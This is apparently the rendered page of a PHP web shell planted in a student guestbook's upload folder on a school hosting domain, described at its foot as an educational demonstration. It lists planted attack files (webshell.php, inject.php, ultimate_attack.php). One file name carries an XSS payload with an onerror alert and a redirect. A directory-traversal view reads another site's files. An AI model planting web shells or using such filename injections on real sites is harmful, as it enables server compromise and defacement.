ð WEB SHELL ACTIVATED
ð File Browser
Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads
ð ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png
[view]ð
..ð 003b15869ae62d2ceeee451a5f652dd6.png
[view]ð 0tk5j14v024b1.jpg
[view]ð 300px-Cursed_Cat.jpg
[view]ð 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg
[view]ð Bill-Gates-Paul-Allen-2013.jpg
[view]ð CV Jasper Kramp.png
[view]ð Cat profile.png
[view]ð Fronalpstock_big.jpg
[view]ð Krik en las.jpg
[view]ð Krik.jpg
[view]ð Pino-dood-03.jpg
[view]ð Shellz.php
[view]ð Ted_Kaczynski_2_(cropped).jpg
[view]ð Tux.svg.png
[view]ð Z.png
[view]ð android.jpg
[view]ð apple.php
[view]ð cianancatfish.jpg
[view]ð downloads (1).jpeg
[view]ð downloads.jpeg
[view]ð epresso.jpg
[view]ð fake_photo.png
[view]ð hand.jpg
[view]ð https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg
[view]ð image.png
[view]ð images.jpeg
[view]ð info.php
[view]ð inject.php
[view]ð instant_redirect.jpg
[view]ð japper.jpg
[view]ð koekiemonster-3.jpg
[view]ð logo.png
[view]ð muis.jpg
[view]ð people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg
[view]ð picobellobv.jpeg
[view]ð redirect.php
[view]ð rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg
[view]ð sdfsa.png
[view]ð sneaky.svg
[view]ð taylor.webp
[view]ð test.html
[view]ð testpreg.php
[view]ð testpreg1.php
[view]ð testtest.php.JPG
[view]ð ultimate_attack.gif
[view]ð ultimate_attack.php
[view]ð ultimate_attack.svg
[view]ð wallpaper.jpg
[view]ð webshell.php
[view]ð Viewing: ./../../../../574486.klas4s23.mid-ica.nl/public_html/src/../node_modules/string-width-cjs/readme.md
# string-width
> Get the visual width of a string - the number of columns required to display it
Some Unicode characters are [fullwidth](https://en.wikipedia.org/wiki/Halfwidth_and_fullwidth_forms) and use double the normal width. [ANSI escape codes](https://en.wikipedia.org/wiki/ANSI_escape_code) are stripped and doesn't affect the width.
Useful to be able to measure the actual width of command-line output.
## Install
```
$ npm install string-width
```
## Usage
```js
const stringWidth = require('string-width');
stringWidth('a');
//=> 1
stringWidth('å€');
//=> 2
stringWidth('\u001B[1må€\u001B[22m');
//=> 2
```
## Related
- [string-width-cli](https://github.com/sindresorhus/string-width-cli) - CLI for this module
- [string-length](https://github.com/sindresorhus/string-length) - Get the real length of a string
- [widest-line](https://github.com/sindresorhus/widest-line) - Get the visual width of the widest line in a string
---
<div align="center">
<b>
<a href="https://tidelift.com/subscription/pkg/npm-string-width?utm_source=npm-string-width&utm_medium=referral&utm_campaign=readme">Get professional support for this package with a Tidelift subscription</a>
</b>
<br>
<sub>
Tidelift helps make open source sustainable for maintainers while giving companies<br>assurances about security, maintenance, and licensing for their dependencies.
</sub>
</div>
ð¯ Available Actions
â ïž Educational Warning: This demonstrates a web shell vulnerability.
In a real attack, this could allow complete server compromise!